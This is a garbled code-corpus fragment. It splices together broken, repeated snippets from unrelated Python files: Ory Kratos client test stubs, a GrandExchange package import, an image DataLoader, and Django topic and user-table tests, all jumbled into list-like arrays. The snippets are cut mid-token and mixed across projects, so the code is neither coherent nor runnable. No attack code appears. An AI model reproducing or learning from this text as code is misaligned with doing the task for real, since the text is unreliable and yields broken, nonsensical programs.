# noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow(self):", "noqa: E501 \"\"\" pass def test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test case for create_self_service_logout_flow_url_for_browsers", "def test_submit_self_service_verification_flow(self): \"\"\"Test case for submit_self_service_verification_flow Complete Verification Flow #", "Login Flow for APIs, Services, Apps, ... # noqa: E501", "for submit_self_service_logout_flow Complete Self-Service Logout # noqa: E501 \"\"\" pass", "administrative Ory Kratos APIs. Public and administrative APIs are exposed", "\"\"\" pass def test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_recovery_flow_for_browsers Initialize Recovery", "case for admin_create_identity Create an Identity # noqa: E501 \"\"\"", "noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_recovery_flow_for_browsers", "for APIs, Services, Apps, ... # noqa: E501 \"\"\" pass", "of the OpenAPI document: v0.7.0-alpha.1 Contact: <EMAIL> Generated by: https://openapi-generator.tech", "noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case for initialize_self_service_login_flow_without_browser", "Oathkeeper, or any other technology capable of authorizing incoming requests.", "the public internet without any protection while administrative APIs should", "Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test", "Flow # noqa: E501 \"\"\" pass def test_submit_self_service_settings_flow(self): \"\"\"Test case", "exposed without prior authorization. To protect the administative API port", "noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test case for initialize_self_service_verification_flow_without_browser", "def test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test case for submit_self_service_logout_flow_without_browser Perform Logout for APIs,", "URL for Browsers # noqa: E501 \"\"\" pass def test_get_json_schema(self):", "test_get_self_service_recovery_flow(self): \"\"\"Test case for get_self_service_recovery_flow Get Recovery Flow # noqa:", "def test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test case for create_self_service_logout_flow_url_for_browsers Create a Logout URL", "noqa: E501 \"\"\" pass def test_admin_get_identity(self): \"\"\"Test case for admin_get_identity", "for initialize_self_service_settings_flow_without_browser Initialize Settings Flow for APIs, Services, Apps, ...", "case for submit_self_service_registration_flow Submit a Registration Flow # noqa: E501", "\"\"\" pass def test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test case for create_self_service_logout_flow_url_for_browsers Create a", "Flow for Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_without_browser(self):", "\"\"\"Test case for get_self_service_settings_flow Get Settings Flow # noqa: E501", "Identity # noqa: E501 \"\"\" pass def test_admin_get_identity(self): \"\"\"Test case", "for Browsers # noqa: E501 \"\"\" pass def test_get_json_schema(self): \"\"\"Test", "for initialize_self_service_registration_flow_for_browsers Initialize Registration Flow for Browsers # noqa: E501", "noqa: E501 \"\"\" pass def test_submit_self_service_login_flow(self): \"\"\"Test case for submit_self_service_login_flow", "\"\"\" import unittest import ory_kratos_client from ory_kratos_client.api.v0alpha1_api import V0alpha1Api #", "admin_create_identity Create an Identity # noqa: E501 \"\"\" pass def", "never be exposed without prior authorization. To protect the administative", "pass def test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test case for initialize_self_service_registration_flow_without_browser Initialize Registration Flow", "should use something like Nginx, Ory Oathkeeper, or any other", "public internet without any protection while administrative APIs should never", "use something like Nginx, Ory Oathkeeper, or any other technology", "E501 \"\"\" pass def test_admin_create_self_service_recovery_link(self): \"\"\"Test case for admin_create_self_service_recovery_link Create", "pass def test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_verification_flow_for_browsers Initialize Verification Flow", "Services, Apps, ... # noqa: E501 \"\"\" pass def test_submit_self_service_login_flow(self):", "Contact: <EMAIL> Generated by: https://openapi-generator.tech \"\"\" import unittest import ory_kratos_client", "initialize_self_service_login_flow_for_browsers Initialize Login Flow for Browsers # noqa: E501 \"\"\"", "# noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test case for", "\"\"\" pass def test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_login_flow_for_browsers Initialize Login", "def test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_recovery_flow_for_browsers Initialize Recovery Flow for", "prior authorization. To protect the administative API port you should", "def test_admin_delete_identity(self): \"\"\"Test case for admin_delete_identity Delete an Identity #", "an Identity # noqa: E501 \"\"\" pass def test_admin_list_identities(self): \"\"\"Test", "Kratos APIs. Public and administrative APIs are exposed on different", "... # noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test case", "Self-Service Logout # noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test", "document: v0.7.0-alpha.1 Contact: <EMAIL> Generated by: https://openapi-generator.tech \"\"\" import unittest", "Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case", "unittest import ory_kratos_client from ory_kratos_client.api.v0alpha1_api import V0alpha1Api # noqa: E501", "by: https://openapi-generator.tech \"\"\" import unittest import ory_kratos_client from ory_kratos_client.api.v0alpha1_api import", "Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test", "Check Who the Current HTTP Session Belongs To # noqa:", "test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_recovery_flow_for_browsers Initialize Recovery Flow for Browsers", "# noqa: E501 \"\"\" pass def test_admin_update_identity(self): \"\"\"Test case for", "noqa: E501 \"\"\" pass def test_submit_self_service_verification_flow(self): \"\"\"Test case for submit_self_service_verification_flow", "V0alpha1Api() # noqa: E501 def tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test", "Get an Identity # noqa: E501 \"\"\" pass def test_admin_list_identities(self):", "Apps, ... # noqa: E501 \"\"\" pass def test_submit_self_service_recovery_flow(self): \"\"\"Test", "noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_login_flow_for_browsers", "noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test case for initialize_self_service_registration_flow_without_browser", "test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test case for submit_self_service_logout_flow_without_browser Perform Logout for APIs, Services,", "APIs are exposed on different ports. Public APIs can face", "# noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test case for", "test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case for initialize_self_service_recovery_flow_without_browser Initialize Recovery Flow for APIs,", "# noqa: E501 \"\"\" pass def test_to_session(self): \"\"\"Test case for", "for get_self_service_error Get Self-Service Errors # noqa: E501 \"\"\" pass", "E501 \"\"\" pass def test_admin_delete_identity(self): \"\"\"Test case for admin_delete_identity Delete", "def test_get_self_service_error(self): \"\"\"Test case for get_self_service_error Get Self-Service Errors #", "# noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test case for", "get_self_service_login_flow Get Login Flow # noqa: E501 \"\"\" pass def", "Delete an Identity # noqa: E501 \"\"\" pass def test_admin_get_identity(self):", "\"\"\"Test case for get_self_service_recovery_flow Get Recovery Flow # noqa: E501", "noqa: E501 \"\"\" pass def test_get_self_service_verification_flow(self): \"\"\"Test case for get_self_service_verification_flow", "Perform Logout for APIs, Services, Apps, ... # noqa: E501", "Kratos API Documentation for all public and administrative Ory Kratos", "Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test", "\"\"\" pass def test_get_self_service_recovery_flow(self): \"\"\"Test case for get_self_service_recovery_flow Get Recovery", "E501 \"\"\" pass def test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test case for create_self_service_logout_flow_url_for_browsers Create", "test stubs\"\"\" def setUp(self): self.api = V0alpha1Api() # noqa: E501" ]
[ "from .item import Item from .priceinfo import PriceInfo from .pricetrend", "import Item from .priceinfo import PriceInfo from .pricetrend import PriceTrend", ".grandexchange import GrandExchange, GameItemNotFound, GameItemParseError from .item import Item from", "GameItemParseError from .item import Item from .priceinfo import PriceInfo from", ".item import Item from .priceinfo import PriceInfo from .pricetrend import", "from .grandexchange import GrandExchange, GameItemNotFound, GameItemParseError from .item import Item", "import GrandExchange, GameItemNotFound, GameItemParseError from .item import Item from .priceinfo", "GrandExchange, GameItemNotFound, GameItemParseError from .item import Item from .priceinfo import", "GameItemNotFound, GameItemParseError from .item import Item from .priceinfo import PriceInfo" ]
[ "extracting labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): # setting the", "# label # data_type data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist()", "cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28 image = cv2.resize(image, (128,", "img_path) # extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain =", "DataLoader: def load_data(): ''' This function is handling the data", "= [] y_train = [] x_test = [] y_test =", "the data loading and pre-processing :return: (xtrain, ytrain), (xtest, ytest)", "= os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path,", "is handling the data loading and pre-processing :return: (xtrain, ytrain),", "as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: #", "train data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the", "os import numpy as np import cv2 from utils import", "= os.path.join(train_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)", "x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the path to", "import numpy as np import cv2 from utils import constants", "# reading meta data file as dataframe df = pd.read_csv(metadata_csv_path,", "current image img_path = os.path.join(test_img_dir_path, image_row[row]) # reading image image", "dataset format: # image_name # label # data_type data_type_row =", "the path of the current image img_path = os.path.join(train_img_dir_path, image_row[row])", "''' This function is handling the data loading and pre-processing", "data_rows = len(data_type_row) for row in range(data_rows): if (data_type_row[row] ==", "for row in range(data_rows): if (data_type_row[row] == \"TRAIN\"): # setting", "delimiter=',') # dataset format: # image_name # label # data_type", "pd import os import numpy as np import cv2 from", "y_train = [] x_test = [] y_test = [] #", "****') x_train = [] y_train = [] x_test = []", "DAugmentor ****') x_train = [] y_train = [] x_test =", "print(\"Loaded: \" + img_path) # extracting labels y_test.append(label_row[row]) xtrain =", "+ img_path) # extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain", "128)) x_train.append(image) print(\"Loaded: \" + img_path) # extracting labels y_train.append(label_row[row])", "(data_type_row[row] == \"TRAIN\"): # setting the path of the current", "import os import numpy as np import cv2 from utils", "''' print('**** Read data into DAugmentor ****') x_train = []", "class DataLoader: def load_data(): ''' This function is handling the", "image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling", "# extracting labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): # setting", "const.DIR_TRAIN) print(metadata_csv_path) # setting the path to train data x_train_path", "df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows = len(data_type_row)", "as np import cv2 from utils import constants as const", "ytrain), (xtest, ytest) ''' print('**** Read data into DAugmentor ****')", "image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28 image", "path of the current image img_path = os.path.join(test_img_dir_path, image_row[row]) #", "np.asarray(y_train) xtest = np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape)", "# downscaling image to 28x28 image = cv2.resize(image, (128, 128))", "= np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train,", "ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test,", "if (data_type_row[row] == \"TEST\"): # setting the path of the", "loading and pre-processing :return: (xtrain, ytrain), (xtest, ytest) ''' print('****", "downscaling image to 28x28 image = cv2.resize(image, (128, 128)) x_test.append(image)", "= os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the path to train", "\" + img_path) # extracting labels y_train.append(label_row[row]) if (data_type_row[row] ==", "meta data file as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') #", "os.path.join(train_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) #", "file as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset format:", "pandas as pd import os import numpy as np import", "format: # image_name # label # data_type data_type_row = df[\"data_type\"].tolist()", "len(data_type_row) for row in range(data_rows): if (data_type_row[row] == \"TRAIN\"): #", "y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain = np.asarray(y_train) xtest = np.asarray(x_test)", "to 28x28 image = cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \"", "= cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \" + img_path) #", "setting the path of the current image img_path = os.path.join(test_img_dir_path,", "pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: # image_name # label #", "reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to", "and pre-processing :return: (xtrain, ytrain), (xtest, ytest) ''' print('**** Read", "current image img_path = os.path.join(train_img_dir_path, image_row[row]) # reading image image", "os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the path to train data", "data x_test_path = os.path.join(path, const.DIR_TEST) # reading meta data file", "ytest) ''' print('**** Read data into DAugmentor ****') x_train =", "[] y_test = [] # setting the path to metadata", "= os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting", "df[\"label\"].tolist() data_rows = len(data_type_row) for row in range(data_rows): if (data_type_row[row]", "cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28 image = cv2.resize(image,", "pre-processing :return: (xtrain, ytrain), (xtest, ytest) ''' print('**** Read data", "the path to metadata path = const.PATH metadata_csv_path = os.path.join(path,", "# reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image", "os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the", "print(x_train_path) # setting the path to train data x_test_path =", "# image_name # label # data_type data_type_row = df[\"data_type\"].tolist() image_row", "y_test = [] # setting the path to metadata path", "to metadata path = const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path", "range(data_rows): if (data_type_row[row] == \"TRAIN\"): # setting the path of", "the current image img_path = os.path.join(test_img_dir_path, image_row[row]) # reading image", "in range(data_rows): if (data_type_row[row] == \"TRAIN\"): # setting the path", "image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28", "import pandas as pd import os import numpy as np", "<gh_stars>1-10 import pandas as pd import os import numpy as", "const.DIR_TRAIN) print(x_train_path) # setting the path to train data x_test_path", "np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return", "into DAugmentor ****') x_train = [] y_train = [] x_test", "# setting the path of the current image img_path =", "setting the path to train data x_test_path = os.path.join(path, const.DIR_TEST)", "image to 28x28 image = cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded:", "as const import matplotlib.pyplot as plt class DataLoader: def load_data():", "[] y_train = [] x_test = [] y_test = []", "import cv2 from utils import constants as const import matplotlib.pyplot", "This function is handling the data loading and pre-processing :return:", "\"TRAIN\"): # setting the path of the current image img_path", "def load_data(): ''' This function is handling the data loading", "numpy as np import cv2 from utils import constants as", "data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows", "[] # setting the path to metadata path = const.PATH", ":return: (xtrain, ytrain), (xtest, ytest) ''' print('**** Read data into", "metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path =", "= [] # setting the path to metadata path =", "extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain = np.asarray(y_train) xtest", "(data_type_row[row] == \"TEST\"): # setting the path of the current", "data into DAugmentor ****') x_train = [] y_train = []", "df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows = len(data_type_row) for row in", "= df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows =", "print(metadata_csv_path) # setting the path to train data x_train_path =", "xtest = np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape)", "path to train data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) #", "x_test_path = os.path.join(path, const.DIR_TEST) # reading meta data file as", "image img_path = os.path.join(train_img_dir_path, image_row[row]) # reading image image =", "if (data_type_row[row] == \"TRAIN\"): # setting the path of the", "image = cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \" + img_path)", "import matplotlib.pyplot as plt class DataLoader: def load_data(): ''' This", "# data_type data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row =", "= df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows = len(data_type_row) for row", "matplotlib.pyplot as plt class DataLoader: def load_data(): ''' This function", "train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the path to", "os.path.join(test_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) #", "28x28 image = cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \" +", "os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN)", "np.asarray(x_train) ytrain = np.asarray(y_train) xtest = np.asarray(x_test) ytest = np.asarray(y_test)", "image_name # label # data_type data_type_row = df[\"data_type\"].tolist() image_row =", "from utils import constants as const import matplotlib.pyplot as plt", "print(\"Loaded: \" + img_path) # extracting labels y_train.append(label_row[row]) if (data_type_row[row]", "labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): # setting the path", "img_path = os.path.join(test_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path,", "data loading and pre-processing :return: (xtrain, ytrain), (xtest, ytest) '''", "data file as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset", "df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: # image_name #", "cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \" + img_path) # extracting", "# setting the path to train data x_test_path = os.path.join(path,", "x_train = [] y_train = [] x_test = [] y_test", "labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain = np.asarray(y_train) xtest =", "cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \" + img_path) # extracting", "= [] y_test = [] # setting the path to", "= np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test)", "label # data_type data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row", "128)) x_test.append(image) print(\"Loaded: \" + img_path) # extracting labels y_test.append(label_row[row])", "path to metadata path = const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA)", "= const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST)", "const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path)", "28x28 image = cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \" +", "= os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the path to train", "to train data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting", "constants as const import matplotlib.pyplot as plt class DataLoader: def", "img_path) # extracting labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): #", "print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return (xtrain, ytrain), (xtest, ytest)", "= os.path.join(test_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)", "metadata path = const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path =", "# dataset format: # image_name # label # data_type data_type_row", "of the current image img_path = os.path.join(test_img_dir_path, image_row[row]) # reading", "downscaling image to 28x28 image = cv2.resize(image, (128, 128)) x_train.append(image)", "row in range(data_rows): if (data_type_row[row] == \"TRAIN\"): # setting the", "setting the path of the current image img_path = os.path.join(train_img_dir_path,", "= len(data_type_row) for row in range(data_rows): if (data_type_row[row] == \"TRAIN\"):", "x_train.append(image) print(\"Loaded: \" + img_path) # extracting labels y_train.append(label_row[row]) if", "== \"TEST\"): # setting the path of the current image", "# setting the path to metadata path = const.PATH metadata_csv_path", "utils import constants as const import matplotlib.pyplot as plt class", "xtrain = np.asarray(x_train) ytrain = np.asarray(y_train) xtest = np.asarray(x_test) ytest", "plt class DataLoader: def load_data(): ''' This function is handling", "print('**** Read data into DAugmentor ****') x_train = [] y_train", "import constants as const import matplotlib.pyplot as plt class DataLoader:", "= [] x_test = [] y_test = [] # setting", "(xtest, ytest) ''' print('**** Read data into DAugmentor ****') x_train", "img_path = os.path.join(train_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path,", "== \"TRAIN\"): # setting the path of the current image", "cv2 from utils import constants as const import matplotlib.pyplot as", "print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return (xtrain, ytrain), (xtest,", "the current image img_path = os.path.join(train_img_dir_path, image_row[row]) # reading image", "y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): # setting the path of", "ytrain = np.asarray(y_train) xtest = np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape)", "load_data(): ''' This function is handling the data loading and", "= pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: # image_name # label", "train data x_test_path = os.path.join(path, const.DIR_TEST) # reading meta data", "os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the path to train data", "reading meta data file as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',')", "of the current image img_path = os.path.join(train_img_dir_path, image_row[row]) # reading", "data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the path", "label_row = df[\"label\"].tolist() data_rows = len(data_type_row) for row in range(data_rows):", "np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train),", "to 28x28 image = cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \"", "const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the path", "the path to train data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path)", "as pd import os import numpy as np import cv2", "(128, 128)) x_test.append(image) print(\"Loaded: \" + img_path) # extracting labels", "# extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain = np.asarray(y_train)", "x_test.append(image) print(\"Loaded: \" + img_path) # extracting labels y_test.append(label_row[row]) xtrain", "= cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \" + img_path) #", "= np.asarray(x_train) ytrain = np.asarray(y_train) xtest = np.asarray(x_test) ytest =", "# setting the path to train data x_train_path = os.path.join(path,", "path = const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path,", "const.DIR_TEST) # reading meta data file as dataframe df =", "setting the path to train data x_train_path = os.path.join(path, const.DIR_TRAIN)", "(128, 128)) x_train.append(image) print(\"Loaded: \" + img_path) # extracting labels", "+ img_path) # extracting labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"):", "x_test = [] y_test = [] # setting the path", "the path to train data x_test_path = os.path.join(path, const.DIR_TEST) #", "as plt class DataLoader: def load_data(): ''' This function is", "\" + img_path) # extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train)", "const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path", "to train data x_test_path = os.path.join(path, const.DIR_TEST) # reading meta", "handling the data loading and pre-processing :return: (xtrain, ytrain), (xtest,", "= os.path.join(path, const.DIR_TEST) # reading meta data file as dataframe", "image to 28x28 image = cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded:", "dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: # image_name", "os.path.join(path, const.DIR_TEST) # reading meta data file as dataframe df", "function is handling the data loading and pre-processing :return: (xtrain,", "image img_path = os.path.join(test_img_dir_path, image_row[row]) # reading image image =", "print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return (xtrain,", "print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return (xtrain, ytrain),", "data_type data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist()", "(xtrain, ytrain), (xtest, ytest) ''' print('**** Read data into DAugmentor", "const import matplotlib.pyplot as plt class DataLoader: def load_data(): '''", "the path of the current image img_path = os.path.join(test_img_dir_path, image_row[row])", "= cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28 image =", "path of the current image img_path = os.path.join(train_img_dir_path, image_row[row]) #", "setting the path to metadata path = const.PATH metadata_csv_path =", "\"TEST\"): # setting the path of the current image img_path", "image = cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \" + img_path)", "path to train data x_test_path = os.path.join(path, const.DIR_TEST) # reading", "image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows = len(data_type_row) for", "Read data into DAugmentor ****') x_train = [] y_train =", "[] x_test = [] y_test = [] # setting the", "np import cv2 from utils import constants as const import", "test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) #", "= df[\"label\"].tolist() data_rows = len(data_type_row) for row in range(data_rows): if", "= np.asarray(y_train) xtest = np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape)" ]
[ "f: while True: c = f.read(1) if not c: break", "lexer import * import sys if len(sys.argv) != 2: print(\"usage:", "2: print(\"usage: main.py file\") else: lex = Lexer(sys.argv[1]) with open(sys.argv[1])", "open(sys.argv[1]) as f: while True: c = f.read(1) if not", "from lexer import * import sys if len(sys.argv) != 2:", "* import sys if len(sys.argv) != 2: print(\"usage: main.py file\")", "else: lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while True:", "as f: while True: c = f.read(1) if not c:", "!= 2: print(\"usage: main.py file\") else: lex = Lexer(sys.argv[1]) with", "with open(sys.argv[1]) as f: while True: c = f.read(1) if", "<filename>CompilerPython/LexerPython/main.py from lexer import * import sys if len(sys.argv) !=", "lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while True: c", "main.py file\") else: lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as f:", "if len(sys.argv) != 2: print(\"usage: main.py file\") else: lex =", "Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while True: c = f.read(1)", "file\") else: lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while", "= Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while True: c =", "import sys if len(sys.argv) != 2: print(\"usage: main.py file\") else:", "print(\"usage: main.py file\") else: lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as", "import * import sys if len(sys.argv) != 2: print(\"usage: main.py", "while True: c = f.read(1) if not c: break print(lex.scan().toString())", "len(sys.argv) != 2: print(\"usage: main.py file\") else: lex = Lexer(sys.argv[1])", "sys if len(sys.argv) != 2: print(\"usage: main.py file\") else: lex" ]
[ "= self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) #", "get_topic(request, self.dep.id, outsider_topic.id) flag = False except Http404: flag =", "test request = self.client.post(url, data=data) # Assert test self.assertEqual(302, request.status_code)", "django.urls import reverse from django.test import TestCase, RequestFactory from django.http", "= reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\",", "self.topic.id) # Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup", "self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name',", "self.topic.id})) request.user = self.user # Exercise test another_dep = Department.objects.create()", "test_return_topic_that_match_user(self): # Setup test request = RequestFactory() request = request.get(reverse('get_topic',", "dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test", "setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac", "test_return_topic_that_outside_user_topics(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test test test\",", "UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac,", "faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = 